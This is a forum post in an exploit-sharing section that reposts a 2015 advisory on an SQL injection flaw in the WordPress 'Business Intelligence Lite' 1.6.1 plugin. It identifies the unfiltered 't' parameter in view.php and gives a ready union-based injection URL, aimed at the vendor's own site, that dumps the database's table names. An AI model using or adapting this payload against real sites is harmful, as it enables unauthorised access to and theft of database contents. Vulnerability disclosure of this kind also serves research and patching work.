Jump to content
KhiZaRix

WordPress Business Intelligence Lite 1.6.1 SQL Injection

By KhiZaRix, in Exploituri

Recommended Posts

KhiZaRix Newbie

KhiZaRix

Posted
Posted

##################################################################################################

#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability

#Author : Jagriti Sahu AKA Incredible

#Vendor Link : https://www.wpbusinessintelligence.com

#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip

#Date : 1/04/2015

#Discovered at : IndiShell Lab

#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^

##################################################################################################

////////////////////////

/// Overview:

////////////////////////

Wordpress plugin "Business Intelligence" is not filtering data in GET parameter ' t ', which in is file 'view.php'

and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place.

///////////////////////////////

// Vulnerability Description: /

///////////////////////////////

vulnerability is due to parameter " t " in file 'view.php'.

user can inject sql query uning GET parameter 't'

////////////////

/// POC ////

///////////////

POC Image URL--->

=================

Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting

SQL Injection in parameter 't' (file 'view.php'):

=================================================

Injectable Link---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php?t=1

Union based SQL injection exist in the parameter which can be exploited as follows:

Payload used in Exploitation for Database name --->

http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php

?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+

###################################################################################################

--==[[special Thanks to]]==--

# Manish Kishan Tanwar ^_^ #

Source: http://packetstorm.wowhacker.com/1504-exploits/wpbusinessintelligence-sql.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...